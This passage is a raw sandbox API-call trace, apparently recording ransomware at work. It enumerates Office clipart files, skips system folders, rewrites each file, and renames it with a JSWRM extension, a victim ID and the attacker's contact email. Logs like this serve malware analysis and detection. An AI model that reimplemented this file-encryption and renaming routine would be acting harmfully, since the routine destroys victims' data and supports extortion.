(lpString1="SO00152_.WMF", lpString2="system volume information") returned -1 [0095.495] lstrcmpiW (lpString1="SO00152_.WMF", lpString2="msocache") returned 1 [0095.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0095.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00152_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00152_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00152_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0095.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0095.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00152_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00152_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00152_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0095.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0095.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0095.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0095.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.496] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31360) returned 1 [0095.496] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7a80) returned 0x24d210 [0095.496] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7a80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7a80, lpOverlapped=0x0) returned 1 [0095.500] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.500] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7a80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7a80, lpOverlapped=0x0) returned 1 [0095.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.501] CloseHandle (hObject=0x314) returned 1 [0095.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0095.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0095.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0095.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0095.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0095.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0095.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.501] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00152_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00152_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00152_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0095.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0095.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0095.502] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4754, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00157_.WMF", cAlternateFileName="")) returned 1 [0095.502] lstrcmpiW (lpString1="SO00157_.WMF", lpString2=".") returned 1 [0095.502] lstrcmpiW (lpString1="SO00157_.WMF", lpString2="..") returned 1 [0095.502] lstrcmpiW (lpString1="SO00157_.WMF", lpString2="...") returned 1 [0095.502] lstrcmpiW (lpString1="SO00157_.WMF", lpString2="windows") returned -1 [0095.502] lstrcmpiW (lpString1="SO00157_.WMF", lpString2="recovery") returned 1 [0095.502] lstrcmpiW (lpString1="SO00157_.WMF", lpString2="perflogs") returned 1 [0095.502] lstrcmpiW (lpString1="SO00157_.WMF", lpString2="documents and settings") returned 1 [0095.502] lstrcmpiW (lpString1="SO00157_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.502] lstrcmpiW (lpString1="SO00157_.WMF", lpString2="system volume information") returned -1 [0095.502] lstrcmpiW (lpString1="SO00157_.WMF", lpString2="msocache") returned 1 [0095.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0095.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00157_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00157_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00157_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0095.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0095.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00157_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00157_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00157_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0095.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0095.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0095.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0095.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00157_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.503] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18260) returned 1 [0095.503] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4750) returned 0x24d210 [0095.504] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4750, lpOverlapped=0x0) returned 1 [0095.507] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.507] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4750, lpOverlapped=0x0) returned 1 [0095.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.507] CloseHandle (hObject=0x314) returned 1 [0095.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0095.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0095.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0095.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0095.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0095.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0095.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.507] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00157_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00157_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00157_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0095.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0095.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0095.508] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2026, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00159_.WMF", cAlternateFileName="")) returned 1 [0095.508] lstrcmpiW (lpString1="SO00159_.WMF", lpString2=".") returned 1 [0095.508] lstrcmpiW (lpString1="SO00159_.WMF", lpString2="..") returned 1 [0095.508] lstrcmpiW (lpString1="SO00159_.WMF", lpString2="...") returned 1 [0095.508] lstrcmpiW (lpString1="SO00159_.WMF", lpString2="windows") returned -1 [0095.508] lstrcmpiW (lpString1="SO00159_.WMF", lpString2="recovery") returned 1 [0095.508] lstrcmpiW (lpString1="SO00159_.WMF", lpString2="perflogs") returned 1 [0095.508] lstrcmpiW (lpString1="SO00159_.WMF", lpString2="documents and settings") returned 1 [0095.508] lstrcmpiW (lpString1="SO00159_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.508] lstrcmpiW (lpString1="SO00159_.WMF", lpString2="system volume information") returned -1 [0095.508] lstrcmpiW (lpString1="SO00159_.WMF", lpString2="msocache") returned 1 [0095.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0095.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00159_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00159_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00159_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0095.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0095.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00159_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00159_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00159_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0095.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0095.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0095.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0095.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00159_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00159_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.510] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8230) returned 1 [0095.510] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2020) returned 0x205850 [0095.510] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2020, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2020, lpOverlapped=0x0) returned 1 [0095.513] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.513] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2020, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2020, lpOverlapped=0x0) returned 1 [0095.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0095.513] CloseHandle (hObject=0x314) returned 1 [0095.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0095.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0095.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0095.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0095.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0095.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0095.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.514] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00159_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00159_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00159_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00159_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0095.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0095.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0095.514] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x35b2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00166_.WMF", cAlternateFileName="")) returned 1 [0095.514] lstrcmpiW (lpString1="SO00166_.WMF", lpString2=".") returned 1 [0095.514] lstrcmpiW (lpString1="SO00166_.WMF", lpString2="..") returned 1 [0095.514] lstrcmpiW (lpString1="SO00166_.WMF", lpString2="...") returned 1 [0095.514] lstrcmpiW (lpString1="SO00166_.WMF", lpString2="windows") returned -1 [0095.515] lstrcmpiW (lpString1="SO00166_.WMF", lpString2="recovery") returned 1 [0095.515] lstrcmpiW (lpString1="SO00166_.WMF", lpString2="perflogs") returned 1 [0095.515] lstrcmpiW (lpString1="SO00166_.WMF", lpString2="documents and settings") returned 1 [0095.515] lstrcmpiW (lpString1="SO00166_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.515] lstrcmpiW (lpString1="SO00166_.WMF", lpString2="system volume information") returned -1 [0095.515] lstrcmpiW (lpString1="SO00166_.WMF", lpString2="msocache") returned 1 [0095.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0095.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00166_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00166_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00166_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0095.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0095.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00166_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00166_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00166_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0095.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0095.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0095.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 